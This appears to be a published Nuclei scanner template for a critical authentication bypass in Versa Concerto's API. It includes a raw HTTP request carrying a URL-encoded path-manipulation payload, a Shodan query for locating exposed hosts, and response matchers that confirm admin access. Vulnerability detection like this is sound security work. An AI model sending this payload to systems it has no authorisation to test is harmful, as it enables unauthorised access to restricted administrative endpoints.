Versa Concerto API Path Based - Authentication Bypass
versa-concerto-api-auth-bypass
Verified
Description
Authentication bypass in the Versa Concerto API, caused by URL decoding inconsistencies. It allowed unauthorized access to certain API endpoints by manipulating the URL path.This issue enabled attackers to bypass authentication controls and access restricted resources.
Severity
Critical
Affected Product
concerto
Published Date
May 21, 2025
Template Author
iamnoooob, rootxharsh, parthmalhotra
+1
versa-concerto-api-auth-bypass.yaml
id: versa-concerto-api-auth-bypass
info:
name: Versa Concerto API Path Based - Authentication Bypass
author: iamnoooob,rootxharsh,parthmalhotra,pdresearch
severity: critical
description: |
Authentication bypass in the Versa Concerto API, caused by URL decoding inconsistencies. It allowed unauthorized access to certain API endpoints by manipulating the URL path.This issue enabled attackers to bypass authentication controls and access restricted resources.
reference:
- https://projectdiscovery.io/blog/versa-concerto-authentication-bypass-rce/
- https://versa-networks.com/documents/datasheets/versa-concerto.pdf
classification:
cpe: cpe:2.3:a:versa-networks:concerto:*:*:*:*:*:*:*:*
metadata:
verified: true
vendor: versa-networks
product: concerto
max-request: 1
shodan-query: http.favicon.hash:-534530225
tags: versa,concerto,api,auth-bypass
http:
- raw:
- |
GET /portalapi/v1/roles/option;%2fv1%2fping HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- ENTERPRISE_ADMINISTRATOR
- type: word
part: header
words:
- EECP-CSRF-TOKEN
# digest: 4a0a00473045022100b0d5ca0d2bd8d42f8cf1bb277fcf3118e73bc5a3ea067e1d864fd1cefde8a8ea02201976f6c2fbe05cc28fe8814bc54b9996342089a320865c6692580316259e0212:922c64590222798bb761d5b6d8e72950